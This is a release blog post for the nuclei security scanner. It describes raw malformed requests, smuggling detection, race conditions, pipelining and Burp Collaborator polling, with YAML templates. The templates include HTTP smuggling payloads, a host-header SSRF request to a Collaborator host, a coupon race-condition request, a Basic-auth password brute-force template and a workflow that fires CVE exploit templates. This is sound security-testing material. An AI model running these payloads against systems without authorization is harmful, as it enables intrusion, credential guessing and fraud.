-

6 min read

Nuclei - Fuzz all the things

Nuclei - Fuzz all the things

The latest nuclei release has been a pretty big one with lots of new features added as well as bug fixes to existing code base. Significant new additions have been made in fuzzing as well templating capabilities of nuclei.

Non-RFC Compliant Requests


Earlier versions of nuclei used the base Go HTTP library. The requests were strictly validated and non-spec compliant requests were dropped. The new release comes with an unsafe attribute using our rawhttp library which allows sending any kind of malformed requests to detect interesting behaviour and allow unlimited control over the sent requests.

Some examples of the type of requests you can send with nuclei unsafe requests are-

  • HTTP Smuggling Requests
  • CRLF Requests with Malformed Characters
  • Custom Host Header Requests
  • Invalid Request Formats, non-standard HTTP Methods, etc.

These examples are just scratching the surface of what’s possible with rawhttp, think complete control over the requests!

HTTP Smuggling

HTTP Smuggling is a class of Web-Attacks recently made popular by Portswigger’s Research into the topic. For an in-depth overview, please visit the article linked above.

In the open source space, detecting http smuggling is difficult particularly due to the requests for detection being malformed by nature. Nuclei is able to reliably detect HTTP Smuggling vulnerabilities utilising the rawhttp engine.

The most basic example of a HTTP Smuggling vulnerability is CL.TE Smuggling. An example template to detect a CE.TL HTTP Smuggling vulnerability is provided below using the unsafe: true attribute for rawhttp based requests.

yaml

1id: CL.TE-http-smuggling
2
3info:
4  name: HTTP request smuggling, basic CL.TE vulnerability
5  author: pdteam
6  severity: info
7  lab: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
8
9requests:
10  - raw:
11    - |
12      POST / HTTP/1.1
13      Host: {{Hostname}}
14      Connection: keep-alive
15      Content-Type: application/x-www-form-urlencoded
16      Content-Length: 6
17      Transfer-Encoding: chunked
18      
19      0
20      
21      G      
22    - |
23      POST / HTTP/1.1
24      Host: {{Hostname}}
25      Connection: keep-alive
26      Content-Type: application/x-www-form-urlencoded
27      Content-Length: 6
28      Transfer-Encoding: chunked
29      
30      0
31      
32      G
33            
34    unsafe: true
35    matchers:
36      - type: word
37        words:
38          - 'Unrecognized method GPOST'

More examples are available in nuclei-docs for smuggling templates.

Other examples

Another example is Host header attacks. These can now be detected very reliably using nuclei with the new rawhttp addition. The example below shows a template for detecting a host header based SSRF from portswigger labs.

yaml

1id: host-header-ssrf
2
3info:
4  name: Flawed Request Parsing Host Header SSRF
5  author: pdteam
6  severity: info
7
8requests:
9  - raw:
10    - |
11     GET https://your-lab-id.web-security-academy.net/
12     Host: your-collaborator-id.burpcollaborator.net     
13    unsafe: true
14...

Race Condition

Race Conditions are another class of bugs not easily automated via traditional tooling. Burp Suite introduced a Gate mechanism to Turbo Intruder where all the bytes for all the requests are sent expect the last one at once which is only sent together for all requests synchronising the send event.

Below is an example template where the same request is repeated for 15 times using the gate logic.

yaml

1id: race-condition-testing
2
3info:
4  name: Race condition testing
5  author: pdteam
6  severity: info
7
8requests:
9  - raw:
10      - |
11        POST /coupons HTTP/1.1
12        Host: {{Hostname}}
13        Pragma: no-cache
14        Cache-Control: no-cache, no-transform
15        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
16
17        promo_code=20OFF        
18
19    race: true
20    race_count: 15
21
22    matchers:
23      - type: status
24        part: header
25        status:
26          - 200

Now test for race conditions in web applications with as simple as this template.

Advanced Fuzzing Support


We’ve enriched nuclei to allow advanced fuzzing of web servers. Users can now use multiple options to tune HTTP fuzzing workflows.

HTTP Pipelining

HTTP Pipelining support has been added which allows multiple HTTP requests to be sent on the same connection inspired from [https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn.

An example template demonstrating pipelining capabilities of nuclei has been provided below-

yaml

1id: pipeline-testing
2info:
3  name: pipeline testing
4  author: pdteam
5  severity: info
6
7requests:
8
9  - payloads:
10      path: path_wordlist.txt
11
12    attack: sniper
13    unsafe: true
14    pipeline: true
15    pipeline-max-connections: 40
16    pipeline-max-workers: 25000
17
18    raw:
19      - |
20        GET /§path§ HTTP/1.1
21        Host: {{Hostname}}
22        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
23        Accept: application/json, text/plain, */*
24        Accept-Language: en-US,en;q=0.5
25        Referer: {{BaseURL}}
26        Connection: keep-alive        
27
28    matchers:
29      - type: status
30        part: header
31        status:
32          - 200
HTTP Connection Pooling

While the earlier versions of nuclei did not do connection pooling, users can now configure templates to either use HTTP connection pooling or not. This allows for faster scanning based on requirement. An example template for this new capability-

yaml

1id: fuzzing-example
2info:
3  name: Connection pooling example
4  author: pdteam
5  severity: info
6
7requests:
8  - payloads:
9      password: password.txt
10
11    threads: 40
12    attack: sniper
13
14    raw:
15      - |
16    raw:
17      - |
18        GET /protected HTTP/1.1
19        Host: {{Hostname}}
20        Authorization: Basic {{base64('admin:§password§')}}
21        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
22        Accept-Language: en-US,en;q=0.9
23        Connection: close
24
25    matchers-condition: and
26    matchers:
27      - type: status
28        status:
29          - 200
30
31      - type: word
32        words:
33          - "Unique string"
34        part: body

Note:- Do not add ‘Connection: Close’ header when using the connection pooling template.

Simplified Workflow Syntax


We use tengo as a scripting engine for nuclei workflows which provided a very powerful and highly customizable engine for users to automate all their needs. However creating a workflows using tengo scripting syntax was something we always wanted to update for better user experience and to align with simple YAML format just like templates.

Workflows have been reworked to adopt simpler YAML based syntax which make creating complex workflows a breeze. Older workflows are still supported and will run flawlessly.

An example template which runs exploits if Spring Web Framework is detected using the new workflow syntax is provided below.

yaml

1workflows:
2  - template: security-misconfiguration/springboot-detect.yaml
3    subtemplates:
4      - template: cves/CVE-2018-1271.yaml
5      - template: cves/CVE-2018-1271.yaml
6      - template: cves/CVE-2020-5410.yaml

Matcher names can also be checked and multiple conditions can be executed. Chained templates are also possible by specifying under the template block.

yaml

1workflows:
2- template: technologies/tech-detect.yaml
3    matchers:
4      - name: lotus-domino
5        subtemplates:
6          - template: technologies/lotus-domino-version.yaml
7            subtemplates:
8              - template: cves/CVE-2005-2428.yaml

Burp Collaborator Support

We’ve also added support for Burp Collaborator based polling for Out-Of-Band and blind security testing. This allows you to create templates that report interactions based on DNS or HTTP events.

yaml

1id: collab-automation
2info:
3  name: Collab automation with nuclei
4  author: pdteam
5  severity: info
6
7requests:
8  - raw:
9      - |
10        POST /api/v1/proxy HTTP/1.1
11        Host: {{Hostname}}
12        Connection: close
13        Content-Length: 549
14        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36
15        Content-Type: application/json
16        
17        {'url':'http://<collab-id>.burpcollaborator.net/'}        
18
19    matchers:
20      - type: dsl
21        dsl:
22          - "waitfor(6) && collab('')"

Example of running template with collaborator:-

sh

1echo https://vul-target.com | nuclei -t collab-automation.yaml -burp-collaborator-biid xxxxxxx

By default nuclei polls every 5 seconds and keeps track of last 150 collaborator events. Provide it with a Burp Suite Collaborator BIID and you’re good to go!

Miscellaneous


Project Support

We’ve added Project File support which can be used to cache previous requests to targets as well as use the stored request later for re-verification purposes.

When project flag is used it will store the current scan requests in a temporary cache on Disk. These requests can be used later by the templates making the request to same paths. With the project-path path flag, the requests can also be stored to a custom directory.

Basic stats support

We’ve replaced the progress bar with a simpler stats line which is printed every 5 seconds. This was done to simplify the progress bar implementation causing issues on several platforms.

What’s Next?

In the next release, Network Protocol Requests like raw TCP, UDP, etc and Local Directory / Files will be supported.

The complete change-log of this release is available here.

Future of the project

In future, we’ll be adding the following new features to the project. Follow us to keep in touch with the progress.

  • A new documentation site for easy access to templating guide and docs.
  • Notification module to send alerts on identified bugs.
  • UI / Web Form to create a template with just a few clicks.
  • Test Server to validate nuclei templates at runtime.

Questions / Feedback

If you’re already a user of nuclei and would like to suggest some feature or share some ideas, feel free to reach out. You can contact/tweet us on twitter @pdnuclei/ @pdiscoveryio/ contact@projectdiscovery.io. We’d love to hear from you.

You can follow the Nuclei and Nuclei templates project on Github. Contributions of new templates as well as ideas are very welcome!